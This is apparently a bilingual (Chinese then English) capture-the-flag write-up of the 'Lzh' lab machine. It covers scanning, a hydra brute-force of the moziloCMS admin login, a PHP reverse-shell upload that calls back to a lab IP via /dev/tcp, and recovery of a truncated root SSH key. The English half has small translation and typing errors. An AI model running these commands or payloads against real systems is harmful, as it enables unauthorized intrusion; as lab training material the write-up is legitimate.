mazesec lzh
信息收集
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status漏洞分析
发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在此
1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php先转到mozilocms目录
http://192.168.110.133/mozilo/ # 主目录
http://192.168.110.133/mozilo/admin/ # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
//检查管理员账号
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; //检查备用账号
} else {
return false; //登陆失败返回false
}
}前端限制不能输入
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">所以可以暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I得到admin:Admin123进入后台
利用
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>准备payload
根据描述即可获取shell,枚举用户—>welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it权限提升
在welcome主目录中发现一个id_rsa是属于root的。
但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=可以进入root了
经验教训
没有仔细阅读注册的源代码,不知道密码政策
mazesec lzh
Information Gathering
# Nmap 7.95 scan started on Sun Dec 14 06:38:57 2025 with the following command: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133):
The host is online (latency: 0.0012 seconds).
998 closed TCP ports were not displayed (reset).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET, POST, OPTIONS, HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Data files were read from: /usr/share/nmap
Service detection has been completed. Please report any incorrect results at https://nmap.org/submit/.
# Nmap completed on Sun Dec 14 06:39:09 2025: 1 IP address (1 host up) was scanned in 12.33 seconds.Dirsearch started on Sunday, December 14, 2025, at 06:46:14, as follows:
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://168.110.133/server-status
Vulnerability Analysis
The backup.zip file was discovered; it appears to be a website backup. This backup contains MoziloCMS version 3.0.1, which has a vulnerability listed at this link.
Vulnerability Steps to Exploit:
- Log in as an administrator.
- Navigate to the “Files” section via the left menu.
- Create a
.jpgfile that contains PHP Web Shell code. - Upload the file to the server using the upload icon and save it.
- Rename the file to
.phpon the server and save it again. - Access the Web Shell using the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
Additional Steps:
First, navigate to the mozilocms directory:
http://192.168.110.133/mozilo/ # Main directory
http://192.168.110.133/mozilo/admin/ # Admin login page
Too many attempts will result in a block:
“Access to mozilo Admin is temporarily blocked. Incorrect access data has been entered too often. You cannot proceed with the login attempt at this time.”
// Check login credentials
// Initialize the password hashing function
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
// Check the admin account
if ($user == $loginpassword->get("name") && $t_hasher->CheckPassword($pass, $loginpassword->get("pw")) {
return true;
} elseif (strlen($loginpassword->get("username")) > 4 && $user == $loginpassword->get("username") && $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")) {
return true; // Check the alternate account
} else {
return false; // Login failed
}
}The front-end prevents further login attempts.
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled/>Therefore, brute-force cracking is possible:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -IThis yields the password admin:Admin123, allowing access to the backend.
Exploitation:
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1');
?>Prepare the payload and enumerate users to find the correct one (e.g., using welcome as a clue):
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // Welcome message: 3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute itPrivilege escalation:
A private key with the ID id_rsa belonging to root was found in the welcome directory. However, the first three characters are missing. This is an OpenSSH format private key, with a fixed prefix: openssh-key-v1\0.
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=With this key, access to the root account is obtained.
Lessons learned:
I did not carefully read the source code of the registered account system, and as a result, I was unaware of the password policies in place.